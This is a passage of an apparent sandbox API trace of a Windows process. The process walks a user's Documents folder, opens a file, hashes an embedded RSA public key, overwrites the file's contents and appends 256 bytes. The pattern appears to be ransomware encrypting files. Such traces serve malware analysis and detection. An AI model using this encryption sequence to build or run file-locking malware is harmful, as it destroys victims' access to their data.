lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0192.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0192.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0192.631] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1dc7d90, ftCreationTime.dwHighDateTime=0x1d8a1cd, ftLastAccessTime.dwLowDateTime=0xfc527820, ftLastAccessTime.dwHighDateTime=0x1d8a2f5, ftLastWriteTime.dwLowDateTime=0xfc527820, ftLastWriteTime.dwHighDateTime=0x1d8a2f5, nFileSizeHigh=0x0, nFileSizeLow=0x2dd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S_CAeTbN.ots", cAlternateFileName="")) returned 1 [0192.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0192.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0192.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0192.632] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\S_CAeTbN.ots") returned=".ots" [0192.632] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\S_CAeTbN.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\s_caetbn.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.635] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=11729) returned 1 [0192.635] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.639] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2dab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.639] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.641] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.641] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x2dd1, lpOverlapped=0x0) returned 1 [0192.642] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.642] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.642] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.642] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.643] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.643] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.643] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.643] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.643] GetLastError () returned 0x0 [0192.643] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.643] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.644] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.644] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.644] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2dd0) returned 0x2af5168 [0192.644] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3bb8 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c00 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0192.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6218 [0192.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.646] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6218 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6200 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0192.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.649] GetCurrentThreadId () returned 0x5d8 [0192.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7578 [0192.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0192.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.650] GetCurrentThreadId () returned 0x5d8 [0192.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0192.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6200 [0192.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6218 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6278 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6248 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6230 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6290 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6230 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6248 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0192.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6200 [0192.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6260 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6290 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6230 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6278 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0192.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3c00 | out: hHeap=0x2c0000) returned 1 [0192.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.661] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x2dcc, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x2dcc, lpOverlapped=0x0) returned 1 [0192.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0192.662] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2dd1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.662] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: 